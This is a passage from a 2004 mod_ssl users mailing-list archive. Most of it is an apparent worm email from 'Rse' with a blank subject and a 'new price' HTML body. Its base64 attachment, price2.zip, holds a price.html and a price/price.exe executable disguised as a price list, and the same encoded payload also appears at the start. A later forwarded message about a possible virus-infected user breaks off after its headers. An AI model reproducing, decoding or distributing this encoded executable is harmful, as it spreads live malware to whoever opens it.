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

----------ojjwpvwyrcurvztcqlzy--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 20:38:11 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F2B9AA8D0E; Mon,  9 Aug 2004 20:38:10 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from valsad.org (x.mscsoftware.com [192.207.69.1])
	by master.modssl.org (Postfix) with SMTP id BEF00A8D0F
	for ; Mon,  9 Aug 2004 20:38:04 +0200 (CEST)
Date: Mon, 09 Aug 2004 14:38:07 -0500
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------kuvloxvzvkzxxutppveu"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------kuvloxvzvkzxxutppveu
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


new price







----------kuvloxvzvkzxxutppveu
Content-Type: application/octet-stream; name="price2.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="price2.zip"

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

----------kuvloxvzvkzxxutppveu--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 20:48:49 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A3D58A8963; Mon,  9 Aug 2004 20:48:49 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ispmxmta05-srv.alltel.net (ispmxmta05-srv.alltel.net [166.102.165.166])
	by master.modssl.org (Postfix) with ESMTP id BE2D6A893D
	for ; Mon,  9 Aug 2004 20:48:48 +0200 (CEST)
Received: from woodware1 ([162.40.200.174]) by ispmxmta05-srv.alltel.net
          with SMTP
          id <20040809184843.NVPO17206.ispmxmta05-srv.alltel.net@woodware1>
          for ; Mon, 9 Aug 2004 13:48:43 -0500
Message-ID: <0fb901c47e41$7ba3e890$0300000a@woodware1>
From: "Don Woodward" 
To: 
Subject: Fw: Possible virus infected user
Date: Mon, 9 Aug 2004 14:48:38 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1437
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Don Woodward" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


----- Original Message ----- 
From: "Don Woodward"
To: 
Cc: 
Sent: Monday, August 09, 2004 14:44
Subject: Possible virus infected user


